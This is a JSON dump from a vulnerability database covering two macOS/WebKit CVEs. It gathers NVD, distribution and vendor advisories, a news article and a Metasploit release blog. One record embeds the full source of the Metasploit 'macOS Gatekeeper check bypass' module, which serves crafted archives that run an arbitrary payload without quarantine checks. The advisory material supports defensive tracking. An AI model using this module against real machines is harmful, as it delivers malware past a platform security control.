"cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-08-11T23:25:34", "description": "A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T18:15:00", "type": "cve", "title": "CVE-2022-22662", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:fedoraproject:fedora:35", "cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:fedoraproject:fedora:36"], "id": "CVE-2022-22662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22662", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*"]}], "veracode": [{"lastseen": "2023-08-12T02:47:56", "description": "webkitgtk is vulnerable to information disclosure. Processing maliciously crafted web content may disclose sensitive user information due to improper cookie management, which allows a remote attacker to trick the victim into parsing maliciously crafted web content, triggering the vulnerability and gaining access to potentially sensitive information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-12-31T00:45:58", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662"], "modified": "2023-08-09T14:50:46", "id": "VERACODE:38694", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-38694/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "redhatcve": [{"lastseen": "2023-08-11T23:32:17", "description": "A vulnerability was found in WebKitGTK, where an issue occurs due to improper cookie management. This flaw allows a remote attacker to trick the victim into parsing maliciously crafted web content, triggering the vulnerability and gaining access to potentially sensitive information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-07-07T17:59:37", "type": "redhatcve", "title": "CVE-2022-22662", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662"], "modified": "2023-04-06T09:28:11", "id": "RH:CVE-2022-22662", "href": "https://access.redhat.com/security/cve/cve-2022-22662", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2023-08-12T15:50:49", "description": "A cookie management issue was addressed with improved state management.\nThis issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur\n11.6.5. Processing maliciously crafted web content may disclose sensitive\nuser information.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22662", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662"], "modified": "2022-05-26T00:00:00", "id": "UB:CVE-2022-22662", "href": "https://ubuntu.com/security/CVE-2022-22662", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2023-09-09T02:50:58", "description": "A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information.", "cvss3": {}, "published": "2022-05-26T18:15:00", "type": "debiancve", "title": "CVE-2022-22662", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-22662"], "modified": "2022-05-26T18:15:00", "id": "DEBIANCVE:CVE-2022-22662", "href": "https://security-tracker.debian.org/tracker/CVE-2022-22662", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2023-08-12T03:25:44", "description": "This module exploits two CVEs that bypass Gatekeeper. For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS < 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload. For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari, Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute. Because of this, the file will not require quarantining, bypassing Gatekeeper on MacOS versions below 12.3.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-26T21:59:14", "type": "metasploit", "title": "macOS Gatekeeper check bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2022-22616"], "modified": "2022-04-05T15:31:51", "id": "MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/osx_gatekeeper_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module exploits two CVEs that bypass Gatekeeper.\n\n For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no\n Info.plist, which bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n\n For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing\n to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,\n Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.\n Because of this, the file will not require quarantining, bypassing Gatekeeper on\n MacOS versions below 12.3.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # CVE-2021-30657 Discovery\n 'timwr', # Module\n 'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)\n 'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)\n 'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)\n 'Shelby Pace' # CVE-2022-22616 Additions\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['CVE', '2022-22616'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],\n ['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),\n OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])\n ])\n end\n\n def cve\n datastore['CVE']\n end\n\n def check_useragent(user_agent)\n safari_version = nil\n if user_agent =~ %r{Version/(\\d+\\.\\d+(\\.\\d+)*)\\sSafari}\n safari_version = Regexp.last_match(1)\n end\n\n if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 'CVE-2022-22616'\n print_good(\"Safari version #{safari_version} is vulnerable\")\n return true\n end\n\n return false unless user_agent =~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('12.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n\n false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n\n app_file_name = \"#{app_name}.zip\"\n zipped = app_zip(app_name)\n\n if cve == 'CVE-2022-22616'\n zipped = Rex::Text.gzip(zipped)\n app_file_name = \"#{app_file_name}.gz\"\n end\n\n send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_file_name}\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '') if cve != 'CVE-2022-22616'\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n zip.pack\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/osx_gatekeeper_bypass.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-10-07T06:04:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh_bGaWK8rcy2QKWG7Xuq4VBEffsgfDInoNBAISv6CT_exfy0ii_3WAmKPQKFrsOrwt1WiawgftmZDgz18pKv_3pRNE33JKmvGvEvCYRb7e9_TJRZFOqzhlCGRgw-gWhAUlGBMwKW_qkXOSmQGGr04R5JuzvqDx16Na9zpD695l4HaUtWLBOQogzntc/s728-e100/macos.jpg>)\n\nSecurity researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures.\n\nThe vulnerability, tracked as [CVE-2022-32910](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>), is rooted in the built-in Archive Utility and \"could lead to the execution of an unsigned and unnotarized application without displaying security prompts to the user, by using a specially crafted archive,\" Apple device management firm [Jamf](<https://www.jamf.com/blog/jamf-threat-labs-macos-archive-utility-vulnerability/>) said in an analysis.\n\nFollowing responsible disclosure on May 31, 2022, Apple addressed the issue as part of [macOS Big Sur 11.6.8](<https://support.apple.com/en-us/HT213344>) and [Monterey 12.5](<https://support.apple.com/en-us/HT213345>) released on July 20, 2022. The tech giant, for its part, also revised the earlier-issued advisories as of October 4 to add an entry for the flaw.\n\nApple described the bug as a logic issue that could allow an archive file to get around Gatekeeper checks, which is designed so as to ascertain that only trusted software runs on the operating system.\n\nThe security technology achieves this by verifying that the downloaded package is from a legitimate developer and has been notarized by Apple \u2013 i.e., given a stamp of approval to ensure it's not been maliciously tampered with.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhjAIy0uBtlihFi5MNLwqvoCJWzJcq_whjlFhhF-gQ3CyYtLeI7sMh4WzstBSeTgAnHm_DXK1wVYyn7syuHBLuS1d-ReIPCION05vQXC-sqJyAgjsE82K7EZ27nJlvJ7L_c6uMIZFPcto1NX78zAhrg0k6dHonf74LxixQe6RzrAPNsr0jLiMUjXhDCQw/s728-e100/mac.jpg>)\n\n\"Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn't been tricked into running executable code they believed to simply be a data file,\" Apple [notes](<https://support.apple.com/en-in/guide/deployment/dep323ab8aa3/web>) in its support documentation.\n\nIt's also worth noting archive files downloaded from the internet are tagged with the \"com.apple.quarantine\" extended attribute, including the items within the file, so as to trigger a Gatekeeper check prior to execution.\n\nBut in a peculiar quirk discovered by Jamf, it was found that the Archive Utility fails to add the quarantine attribute to a folder \"when extracting an archive containing two or more files or folders in its root directory.\"\n\nThus by creating an archive file with the extension \"exploit.app.zip,\" it leads to a scenario where an unarchival results in the creation of a folder titled \"exploit.app,\" while also lacking the quarantine attribute.\n\nThis application \"will bypass all Gatekeeper checks allowing an unnotarized and/or unsigned binary to execute,\" Jamf researcher Ferdous Saljooki, who discovered the flaw, said. Apple said it resolved the vulnerability with improved checks.\n\nThe findings come more than six months after Apple addressed [another similar flaw](<https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/>) in macOS Catalina, Big Sur 11.6.5, and Monterey 12.3 ([CVE-2022-22616](<https://nvd.nist.gov/vuln/detail/CVE-2022-22616>)) that could allow a malicious ZIP archive to bypass Gatekeeper checks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-10-06T12:20:00", "type": "thn", "title": "Details Released for Recently Patched new macOS Archive Utility Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616", "CVE-2022-32910"], "modified": "2022-10-07T05:13:21", "id": "THN:D49EB15A8EC646123A52948B0E3A1F24", "href": "https://thehackernews.com/2022/10/details-released-for-recently-patched.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2023-08-12T00:55:41", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. This package contains WebKit2 based WebKitGTK for GTK 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-21T17:10:21", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: webkit2gtk3-2.36.4-1.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662", "CVE-2022-26710"], "modified": "2022-07-21T17:10:21", "id": "FEDORA:40905316CFAE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/33BWWAQLLBHKGSI332ZZCORTFZ2XLOIH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-12T00:55:39", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. This package contains WebKit2 based WebKitGTK for GTK 3. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-07T01:21:11", "type": "fedora", "title": "[SECURITY] Fedora 36 Update: webkit2gtk3-2.36.4-1.fc36", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662", "CVE-2022-26710"], "modified": "2022-07-07T01:21:11", "id": "FEDORA:BCA0E304C251", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ANNHXXARVBRGI74TVQNZOAG6P7AGSMUJ/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-09T18:43:30", "description": "## Windows Local Privilege Escalation for standard users\n\n\n\nIn this week\u2019s release, we have an exciting new module that has been added by our very own [Grant Willcox](<https://github.com/gwillcox-r7>) which exploits (CVE-2022-26904)[<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>], and allows for normal users to execute code as `NT AUTHORITY/SYSTEM` on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still not patched and there have not been any updates from MSRC regarding this vulnerability, however it may be patched in the next Patch Tuesday.\n\nThis exploit requires more than one local user to be present on the machine and the `PromptOnSecureDesktop` setting to be set to 1, which is the default setting.\n\n## MacOS exploitation\n\nOur very own [space-r7](<https://github.com/space-r7>) has updated the recent `GateKeeper` module to add support for the recent CVE-2022-22616, which can be used to target all MacOS Catalina versions, and MacOS Monterey versions prior to 12.3.\n\nThis module can be used to remove the `com.apple.quarantine` extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.\n\n## Enumerating Chocolatey applications\n\nThis week\u2019s release also features a new module from a first-time contributor [rad10](<https://github.com/rad10>), which will enumerate all applications that have been installed using Chocolatey.\n\nThis could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.\n\n## New module content (5)\n\n * [User Profile Arbitrary Junction Creation Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/16382>) by Grant Willcox and KLINIX5, which exploits [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904?referrer=blog>) \\- This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user's credentials, to execute code as `NT AUTHORITY\\SYSTEM`. The `PromptOnSecureDesktop` setting must also be set to `1` on the affected machine for this exploit to work, which is the default setting.\n * [ALLMediaServer 1.6 SEH Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/16399>) by Hejap Zairy Al-Sharif, which exploits [CVE-2022-28381](<https://attackerkb.com/topics/TSnBdUJwnJ/cve-2022-28381?referrer=blog>) \\- A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.\n * [Windows Gather Installed Application Within Chocolatey Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16381>) by Nick Cottrell - This adds a post module that enumerates applications installed with Chocolatey on Windows systems.\n * [#16082](<https://github.com/rapid7/metasploit-framework/pull/16082>) from [usiegl00](<https://github.com/usiegl00>) \\- This updates the `shadow_mitm_dispatcher` module by adding a new RubySMB Dispatcher, whichallows a better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.\n * [#16401](<https://github.com/rapid7/metasploit-framework/pull/16401>) from [space-r7](<https://github.com/space-r7>) \\- This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we've introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.\n\n## Enhancements and features (4)\n\n * [#15972](<https://github.com/rapid7/metasploit-framework/pull/15972>) from [sempervictus](<https://github.com/sempervictus>) \\- This updates the Log4shell scanner with the `LEAK_PARAMS` option, providing a way to leak more target information such as environment variables.\n * [#16320](<https://github.com/rapid7/metasploit-framework/pull/16320>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Windows Meterpreter payloads to support a new `MeterpreterDebugBuild` datastore option. When set to true the generated payload will have additional logging support which is visible via Window's DbgView program.\n * [#16373](<https://github.com/rapid7/metasploit-framework/pull/16373>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds initial support for Ruby 3.1\n * [#16403](<https://github.com/rapid7/metasploit-framework/pull/16403>) from [sempervictus](<https://github.com/sempervictus>) \\- This adds more checks to the `post/windows/gather/checkvm` module to better detect if the current target is a Qemu / KVM virtual machine.\n\n## Bugs fixed (3)\n\n * [#16398](<https://github.com/rapid7/metasploit-framework/pull/16398>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of `rspec` checks.\n * [#16408](<https://github.com/rapid7/metasploit-framework/pull/16408>) from [rtpt-alexanderneumann](<https://github.com/rtpt-alexanderneumann>) \\- This fixes an edge case with the `multi/postgres/postgres_copy_from_program_cmd_exec` module, which crashed when the randomly generated table name started with a number\n * [#16419](<https://github.com/rapid7/metasploit-framework/pull/16419>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A bug has been fixed whereby when using the `search` command and searching by `disclosure_date`, the help menu would 